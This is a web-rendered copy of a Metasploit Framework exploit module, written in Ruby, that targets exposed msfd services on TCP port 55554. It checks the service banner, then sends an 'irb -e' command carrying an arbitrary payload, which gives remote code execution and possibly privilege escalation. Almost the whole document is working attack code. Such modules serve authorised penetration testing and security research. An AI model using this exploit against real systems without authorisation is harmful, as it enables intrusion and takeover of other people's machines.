Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/misc/msfd_rce_remote.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = ExcellentRanking
8
9
include Msf::Exploit::Remote::Tcp
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'Metasploit msfd Remote Code Execution',
16
'Description' => %q{
17
Metasploit's msfd-service makes it possible to get a msfconsole-like
18
interface over a TCP socket. If this socket is accessible on a remote
19
interface, an attacker can execute commands on the victim's machine.
20
21
If msfd is running with higher privileges than the current local user,
22
this module can also be used for privilege escalation. In that case,
23
port forwarding on the compromised host can be used.
24
25
Code execution is achieved with the msfconsole command: irb -e 'CODE'.
26
},
27
'Author' => 'Robin Stenvi <robin.stenvi[at]gmail.com>',
28
'License' => BSD_LICENSE,
29
'Platform' => "ruby",
30
'Arch' => ARCH_RUBY,
31
'Payload' => {
32
'Space' => 8192, # Arbitrary limit
33
'BadChars' => "\x27\x0a",
34
'DisableNops' => true
35
},
36
'Targets' => [
37
[ 'Automatic', {} ]
38
],
39
'Privileged' => false,
40
'DisclosureDate' => '2018-04-11', # Vendor notification
41
'DefaultTarget' => 0,
42
'Notes' => {
43
'Reliability' => UNKNOWN_RELIABILITY,
44
'Stability' => UNKNOWN_STABILITY,
45
'SideEffects' => UNKNOWN_SIDE_EFFECTS
46
}
47
)
48
)
49
50
register_options(
51
[
52
Opt::RPORT(55554)
53
]
54
)
55
end
56
57
def check
58
connect
59
data = sock.get_once
60
if data.include?("msf")
61
disconnect
62
return Exploit::CheckCode::Appears
63
end
64
disconnect
65
return Exploit::CheckCode::Unknown
66
end
67
68
def exploit
69
connect
70
sock.get_once
71
sock.put "irb -e '" + payload.encoded + "'\n"
72
disconnect
73
end
74
end
75
76